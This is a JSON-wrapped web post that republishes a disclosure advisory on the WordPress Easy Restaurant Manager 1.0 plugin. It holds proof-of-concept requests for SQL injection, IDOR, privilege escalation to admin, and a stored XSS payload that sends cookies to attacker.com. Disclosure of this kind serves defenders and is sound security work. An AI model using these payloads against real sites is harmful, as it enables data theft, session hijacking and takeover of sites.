{"id":1166,"date":"2025-04-23T06:16:25","date_gmt":"2025-04-23T06:16:25","guid":{"rendered":"http:\/\/localhost\/?p=1166"},"modified":"2025-04-23T06:16:25","modified_gmt":"2025-04-23T06:16:25","slug":"wordpress-easy-restaurant-manager-10-xss-sql-injection-idor","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1166","title":{"rendered":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">PACKETSTORM:190580<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">packetstorm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">0.0<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #666666; font-weight: bold;\">NONE<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">NONE<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nWordPress Easy Restaurant Manager plugin version 1.0 suffers from persistent cross site scripting, insecure direct object&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br \/>    .:. Exploit Title > WordPress Easy Restaurant Manager Plugin &#8211; Multiple Vulnerabilities<br \/>    .:. Date: April 19, 2025<br \/>    .:. Exploit Author: bRpsd<br \/>    .:. Contact: cy[at]live.no<br \/>    .:. Vendor -> https:\/\/wordpress.org\/plugins\/easy-restaurant-manager\/<br \/>    .:. Tested Version -> 1.0<br \/>    .:. DBMS -> MySQL<br \/>    .:. Tested on > macOS [*nix Darwin Kernel], on local xampp<br \/>    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<\/p>\n<p>    [+] Vulnerability #1: SQL Injection<br \/>    Vulnerable Code:<br \/>    ==========================================================================================<br \/>    public static function store($coupon) {<br \/>        return Coupon::store($coupon);<br \/>    }<\/p>\n<p>    public static function updateCoupon($coupon){<br \/>        return Coupon::updateCoupon($coupon);<br \/>    }<\/p>\n<p>    public static function deleteCoupon($id){<br \/>        return Coupon::deleteCoupon($id);<br \/>    }<br \/>    $data = $request->get_param(&#8216;data&#8217;);<br \/>    $id = $data[&#8216;id&#8217;];<br \/>    ==========================================================================================<br \/>    Issue: These methods in CouponResource.php demonstrate how user-controlled input ($coupon, $id) is directly passed to model methods without any visible validation or sanitization. Similar patterns exist across multiple resource classes including ReservationResource, MenuResource, ColorResource, and TableResource. An attacker could exploit this by sending a malicious request to an endpoint that utilizes these methods:<\/p>\n<p>    POC1:<br \/>    POST \/wp-json\/easy-restaurant-manager\/v1\/coupons<br \/>    Content-Type: application\/json<\/p>\n<p>    {<br \/>      &#8220;name&#8221;: &#8220;Discount&#8221;,<br \/>      &#8220;code&#8221;: &#8220;&#8216; OR 1=1; &#8212; &#8220;,<br \/>      &#8220;discount_type&#8221;: &#8220;percentage&#8221;,<br \/>      &#8220;discount_value&#8221;: &#8220;10&#8221;,<br \/>      &#8220;added_date&#8221;: &#8220;2025-04-19&#8221;,<br \/>      &#8220;expiration_date&#8221;: &#8220;2025-05-19&#8221;,<br \/>      &#8220;status&#8221;: &#8220;active&#8221;<br \/>    }<\/p>\n<p>    POC2:<br \/>    POST \/wp-json\/easy-restaurant-manage\/v1\/coupon<br \/>    Content-Type: application\/json<\/p>\n<p>    {<br \/>      &#8220;data&#8221;: {<br \/>        &#8220;id&#8221;: &#8220;1 OR 1=1&#8221;<br \/>      }<br \/>    }<\/p>\n<p>    [+] Vulnerability #2: Missing Access Control in Resource Methods<\/p>\n<p>    Vulnerable code:<br \/>    ==========================================================================================<br \/>    public static function getReservation(){<br \/>        return Reservation::getReservation();<br \/>    }<\/p>\n<p>    public static function UpdateReservation($id, $status){<br \/>        return Reservation::UpdateReservation($id, $status);<br \/>    }<\/p>\n<p>    public static function deleteReservation($id){<br \/>        return Reservation::deleteReservation($id);<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: The resource classes show no evidence of authentication or authorization checks before performing sensitive operations on data.These methods in ReservationResource.php handle sensitive operations without visible permission checks. This could allow unauthorized users to access, modify, or delete data if the API endpoints don&#8217;t implement proper access controls.<\/p>\n<p>    POC:<br \/>    An attacker could attempt to access or modify reservations belonging to other users by manipulating request parameters:<br \/>    DELETE \/wp-json\/easy-restaurant-manager\/v1\/reservations\/123<br \/>    Without proper authorization checks, this could delete any reservation in the system, regardless of whether it belongs to the current user<\/p>\n<p>    [+] Vulnerability #3: Insecure Direct Object References (IDOR)<\/p>\n<p>    Vulnerable code:<br \/>    ================================================================================================================<br \/>    public static function deleteMenu($id){<br \/>        return Menu::deleteMenu($id);<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: This method in MenuResource.php potentially allows access to any menu item by its ID. Without proper access controls, an attacker could simply increment or modify ID values to access or modify resources belonging to other users or branches.By manipulating ID parameters in requests, an attacker could access unauthorized resources:<\/p>\n<p>    POC:<br \/>    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/5<br \/>    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/6<br \/>    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/7<\/p>\n<p>    [+] Vulnerability #4: Stored XSS<\/p>\n<p>    Vulnerable code:<br \/>    ================================================================================================================<br \/>    public static function getTemplateSettings()<br \/>    {<br \/>        return get_option(&#8216;easy_restaurant_manger_menus_template_settings&#8217;, [<br \/>            &#8216;primary_color&#8217; => &#8216;#3498F5&#8217;,<br \/>            &#8216;secondary_color&#8217; => &#8216;#6B3CEB&#8217;,<br \/>            &#8216;background_color&#8217; => &#8216;#fff&#8217;,<br \/>            &#8216;font_color&#8217; => &#8216;#253241&#8217;,<br \/>            &#8216;template&#8217; => &#8216;classic&#8217;,<br \/>            &#8216;menu_single_page&#8217; => &#8216;yes&#8217;,<br \/>            &#8216;category_title&#8217; => &#8216;OUR SPECIAL MENU&#8217;,<br \/>            &#8216;category_short_desc&#8217; => &#8216;Enjoy the unique dishes from the best\/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.&#8217;,<br \/>            &#8216;menus_title&#8217; => &#8216;Menus&#8217;,<br \/>            &#8216;menus_short_desc&#8217; => &#8216;Enjoy the unique dishes from the best\/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.&#8217;,<br \/>        ]);<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: The ColorResource class handles template settings that are used in the frontend that can be adjusted by the user to cause stored XSS.The input is stored and later rendered without proper escaping.<br \/>    An attacker could update color settings or descriptions with malicious JavaScript:<\/p>\n<p>    POC:<br \/>    POST \/wp-json\/easy-restaurant-manager\/v1\/settings<br \/>    Content-Type: application\/json<\/p>\n<p>    {<br \/>      &#8220;category_short_desc&#8221;: &#8220;<script>document.location='https:\/\/attacker.com\/steal.php?cookie='+document.cookie<\/script>&#8220;<br \/>    }<\/p>\n<p>    [+] Vulnerability #5: Custom User Management Vulnerabilities<\/p>\n<p>    Code:<br \/>    ==========================================================================================<br \/>    $sql = &#8220;CREATE TABLE IF NOT EXISTS `{$wpdb->prefix}erm_users` (<br \/>        id INT PRIMARY KEY AUTO_INCREMENT,<br \/>        branch_id INT DEFAULT NULL,<br \/>        name VARCHAR(255) NOT NULL,<br \/>        email VARCHAR(255) UNIQUE NOT NULL,<br \/>        phone VARCHAR(20) NOT NULL,<br \/>        password VARCHAR(255) NOT NULL,<br \/>        role ENUM(&#8216;customer&#8217;, &#8216;admin&#8217;, &#8216;manager&#8217;) NOT NULL DEFAULT &#8216;customer&#8217;,<br \/>        loyalty_points INT DEFAULT 0,<br \/>        created_at DATETIME DEFAULT CURRENT_TIMESTAMP,<br \/>        updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP<br \/>    ) $charset_collate;&#8221;;<\/p>\n<p>    ==========================================================================================<br \/>    Issue: The plugin implements its own user management system rather than leveraging WordPress&#8217;s built-in capabilities. This custom implementation stores passwords and handles user roles separately from WordPress. Without seeing the implementation details, this raises concerns about Password storage security (hashing algorithms, salting),Session management security,Privilege escalation possibilities between custom roles<\/p>\n<p>    If the plugin does not properly validate role changes, an attacker might exploit this to gain elevated privileges like this:<\/p>\n<p>    PUT \/wp-json\/easy-restaurant-manager\/v1\/users\/profile<br \/>    Content-Type: application\/json<\/p>\n<p>    {<br \/>      &#8220;role&#8221;: &#8220;admin&#8221;<br \/>    }<\/p>\n<p>    2025-04-01: Initial discovery<br \/>    2025-04-08: Vendor notification<br \/>    2025-04-12: Follow-up (no response)<br \/>    2025-04-19: Coordinated disclosure\n<\/div>\n<p><a href=\"https:\/\/packetstorm.news\/files\/id\/190580\/\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR Exploit ID PACKETSTORM:190580 Type packetstorm Published 2025-04-21T00:00:00 Modified&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,34,12,13,33,53,7,11,5],"class_list":["post-1166","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=1166\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR Exploit ID PACKETSTORM:190580 Type packetstorm Published 2025-04-21T00:00:00 Modified...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=1166\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T06:16:25+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress Easy Restaurant Manager 1.0 XSS \\\/ SQL Injection \\\/ IDOR\",\"datePublished\":\"2025-04-23T06:16:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166\"},\"wordCount\":783,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1166#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166\",\"name\":\"WordPress Easy Restaurant Manager 1.0 XSS \\\/ SQL Injection \\\/ IDOR - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-23T06:16:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1166\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1166#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress Easy Restaurant Manager 1.0 XSS \\\/ SQL Injection \\\/ IDOR\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=1166","og_locale":"en_US","og_type":"article","og_title":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR - zero redgem","og_description":"Exploit Details Basic Information Exploit Title WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR Exploit ID PACKETSTORM:190580 Type packetstorm Published 2025-04-21T00:00:00 Modified...","og_url":"https:\/\/zero.redgem.net\/?p=1166","og_site_name":"zero redgem","article_published_time":"2025-04-23T06:16:25+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=1166#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=1166"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR","datePublished":"2025-04-23T06:16:25+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=1166"},"wordCount":783,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=1166#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=1166","url":"https:\/\/zero.redgem.net\/?p=1166","name":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-23T06:16:25+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=1166#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=1166"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=1166#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1166"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1166\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}